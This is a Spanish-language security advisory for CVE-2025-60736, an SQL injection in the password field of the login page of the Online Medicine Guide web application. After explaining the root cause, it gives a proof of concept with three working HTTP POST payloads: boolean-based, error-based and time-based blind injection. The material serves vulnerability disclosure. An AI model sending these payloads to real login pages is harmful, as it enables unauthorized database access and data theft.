CVE-2025-60736: Vulnerabilidad de Inyección SQL en Online Medicine Guide
Resumen Ejecutivo
Este documento describe una vulnerabilidad crítica de inyección SQL descubierta en la aplicación web Online Medicine Guide. La vulnerabilidad permite el acceso no autorizado a la base de datos y plantea riesgos de seguridad significativos para la aplicación y sus usuarios.
La vulnerabilidad se origina por una validación y saneamiento insuficientes de las entradas en el archivo /login.php. La aplicación concatena directamente la entrada del usuario del parámetro upass en las consultas SQL sin un saneamiento adecuado ni sentencias preparadas.
Causa Raíz Técnica:
Concatenación directa de cadenas en consultas SQL
Falta de validación y saneamiento de entradas
Ausencia de implementación de sentencias preparadas
Enlace de parámetros insuficiente
3. Prueba de Concepto
Ubicación de la Vulnerabilidad
Archivo: /login.php
Parámetro: upass (POST)
Vector de Ataque: Manipulación de solicitudes HTTP POST
Métodos de Explotación
Método 1: Inyección SQL Basada en Booleanos
root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
uname=uLnf&upass=rZgo' OR NOT 1852=1852-- iPRx
Método 1: Inyección SQL Basada en Errores
root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
uname=uLnf&upass=rZgo' AND EXTRACTVALUE(4672,CONCAT(0x5c,0x7176707071,(SELECT (ELT(4672=4672,1))),0x71717a7071))-- knKp
Método 2: Inyección SQL Ciega Basada en Tiempo
root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
uname=uLnf&upass=rZgo' AND (SELECT 2089 FROM (SELECT(SLEEP(5)))zUlY)-- mWfa